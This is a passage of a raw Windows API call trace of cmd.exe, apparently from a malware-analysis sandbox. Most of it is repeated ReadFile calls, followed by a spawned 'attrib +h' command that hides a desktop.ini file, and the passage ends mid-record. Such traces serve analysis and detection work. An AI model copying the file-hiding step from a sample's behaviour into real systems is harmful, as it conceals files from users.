lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.041] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.041] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.074] _close (_FileHandle=4) returned 0 [0130.074] FindNextFileW (in: hFindFile=0x37e5e8, lpFindFileData=0x26ed00 | out: lpFindFileData=0x26ed00) returned 0 [0130.074] GetLastError () returned 0x12 [0130.074] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.074] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0130.076] _close (_FileHandle=3) returned 0 [0130.077] GetConsoleTitleW (in: lpConsoleTitle=0x26f138, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.077] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.077] GetLastError () returned 0x2 [0130.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.077] GetLastError () returned 0x2 [0130.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0x37e5e8 [0130.078] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.078] GetLastError () returned 0x2 [0130.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0x37e5e8 [0130.078] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.078] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.078] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.078] GetConsoleTitleW (in: lpConsoleTitle=0x26eecc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.078] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ed54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ee1c | out: lpAttributeList=0x26ed54, lpSize=0x26ee1c) returned 1 [0130.078] UpdateProcThreadAttribute (in: lpAttributeList=0x26ed54, dwFlags=0x0, Attribute=0x60001, lpValue=0x26ee14, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ed54, lpPreviousValue=0x0) returned 1 [0130.078] GetStartupInfoW (in: lpStartupInfo=0x26ed10 | out: lpStartupInfo=0x26ed10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0130.078] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.078] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26edb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26edfc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", lpProcessInformation=0x26edfc*(hProcess=0x4c, hThread=0x50, dwProcessId=0x5fc, dwThreadId=0xc4)) returned 1 [0130.082] CloseHandle (hObject=0x50) returned 1 [0130.082] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.082] GetEnvironmentStringsW () returned 0x382c70* [0130.082] FreeEnvironmentStringsW (penv=0x382c70) returned 1 [0130.082] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0130.160] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26ecf0 | out: lpExitCode=0x26ecf0*=0x0) returned 1 [0130.160] CloseHandle (hObject=0x4c) returned 1 [0130.160] _vsnwprintf (in: _Buffer=0x26ee38, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ecfc | out: _Buffer="00000000") returned 8 [0130.160] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0130.160] GetEnvironmentStringsW () returned 0x382c70* [0130.160] FreeEnvironmentStringsW (penv=0x382c70) returned 1 [0130.160] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.160] GetEnvironmentStringsW () returned 0x382c70* [0130.160] FreeEnvironmentStringsW (penv=0x382c70) returned 1 [0130.161] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ed54 | out: lpAttributeList=0x26ed54) [0130.161] GetConsoleTitleW (in: lpConsoleTitle=0x26f138, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.161] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.161] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.161] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.161] GetLastError () returned 0x2 [0130.161] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.161] GetLastError () returned 0x2 [0130.161] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0x37e5e8 [0130.161] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.162] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.162] GetLastError () returned 0x2 [0130.162] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0x37e5e8 [0130.162] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.162] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.162] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.162] GetConsoleTitleW (in: lpConsoleTitle=0x26eecc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.162] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ed54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ee1c | out: lpAttributeList=0x26ed54, lpSize=0x26ee1c) returned 1 [0130.162] UpdateProcThreadAttribute (in: lpAttributeList=0x26ed54, dwFlags=0x0, Attribute=0x60001, lpValue=0x26ee14, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ed54, lpPreviousValue=0x0) returned 1 [0130.162] GetStartupInfoW (in: lpStartupInfo=0x26ed10 | out: lpStartupInfo=0x26ed10*(cb=0x44, lpReserved="", 